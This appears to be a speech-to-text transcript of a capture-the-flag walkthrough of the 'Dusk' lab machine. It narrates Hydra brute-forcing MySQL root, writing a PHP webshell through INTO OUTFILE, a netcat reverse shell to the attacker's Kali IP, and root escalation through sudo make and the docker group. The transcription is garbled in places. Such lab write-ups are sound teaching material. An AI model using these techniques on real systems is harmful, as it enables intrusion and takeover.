and our 100 machine challenge, and new machine is Dusk, and here is running on a virtual box. So we are in our Kali Linux, and this is my vulnerable machine IP address, and this is Kali Linux IP address. And I have used the Rust scan for a fastest scan of Nmap. And here is the scan Nmap scan result: 21, 22, 25, 80, 3306 MySQL, port 8080, HTTP proxy. Okay. So now we try to uh, port 80 on the web browser. First copy this, opening Firefox, and here is port 80 is port 3306 is open for the MySQL. So we trying to the MySQL, and to the brute force we using the Hydra. Okay. Website is currently under construction. Try again later. There is nothing here. So we're trying to the Hydra. Root and password we are using the word list. Rocky.txt and paste our IP address and MySQL. Hit enter. I'm working on the connections brute force on the MySQL, trying to the root, and password is password. So here is the brute force attack result, and we're trying to the port 8080 on this, and see the PHP gallery index.php. This gallery is var.tmp. So we're trying to first log in MySQL. Sorry, MySQL. And dash h for a host, and dash u for a user. Root, enter. password is password. And here we are in this MySQL. So we run the query, select, we inject the vulnerable command, system into out file /var /tmp slash secure7.php. And hidden row is added. So we're trying to the refresh this page, checking the here is secure7 was added. So we're trying to the get the secure7 secure7.php, and we're trying to the some injections cmd equals to id. And here is showing the machine's IP. So we trying to the netcat for the injection nc /binbash into the network 192.168.0.104 is our Kali Linux IP address into the port 444 and go to the terminal. Netcat port 444 is running, and we are trying to run this command and connecting to this machine. And here is the connection is on. So we're trying to Python import so we get the ls command cd/home ls cd dusk ls get user.txt. Here is the first flag So we're trying to sudo -l. Here is the user being ping, user being mac, and user being sl. So we're trying to the user being mac. Okay, so we trying to the command equals to bin bash and hit enter. Here is command bin bash. Okay, so some mistakes. We're trying to command bin sh, not a bash. We're trying to the root the shell sh and fix it sudo -u dusk mac s will equals to dollar dollar command. So we're trying to do this. Okay, make hit enter. Who am I? Dusk ID. That is the dusk ID. So we're trying to the groups. Here is the Docker is the group. Docker is the group. So we have run Docker run hosts OS. Unknown. Okay, so we get some mistakes here. As dash I dash D unable to find the images, pulling the request. And we are rooted. Who am I? This is root cd/root directory. Let's get root.txt, and here we have the root